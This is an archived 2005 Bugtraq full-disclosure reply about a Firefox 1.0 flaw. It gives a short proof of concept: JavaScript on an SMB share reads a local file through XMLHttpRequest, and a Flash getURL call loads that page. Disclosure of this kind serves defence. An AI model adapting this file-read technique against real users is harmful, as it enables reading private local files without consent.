Bugtraq: Re: [Full-Disclosure] Fireflashing [Firefox 1.0]

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: [Full-Disclosure] Fireflashing [Firefox 1.0]

From: Jelmer Kuperus <jkuperus () planet nl>
Date: Sat, 12 Feb 2005 15:25:30 +0100

I took a quick 5 minute look at this, and it looks like you can readarbitrary files with this without requiring any kind of user interaction.

Just create a file called whatever.html on a windows SMB share with thiscontent


--snip--

<script language="javascript">
   var oXML=new XMLHttpRequest();
   oXML.open("GET","file:///C:/jelmer.txt",false);
   oXML.send(null);
   alert(oXML.responseText);
</script>

--snip--

Now create a flash file that opens file://///SOME_IP/SHARENAME/whatever.html

(I just created an empty flash file with a single action that containedthe following line of actionscript : getURL("file://///SOME_IP/SHARENAME/whatever.html", "_self"); )

and presto it will display the contents of c:\jelmer.txt

By Date By Thread

Current thread:

Fireflashing [Firefox 1.0] mikx (Feb 07)
- Re: [Full-Disclosure] Fireflashing [Firefox 1.0] Jelmer Kuperus (Feb 12)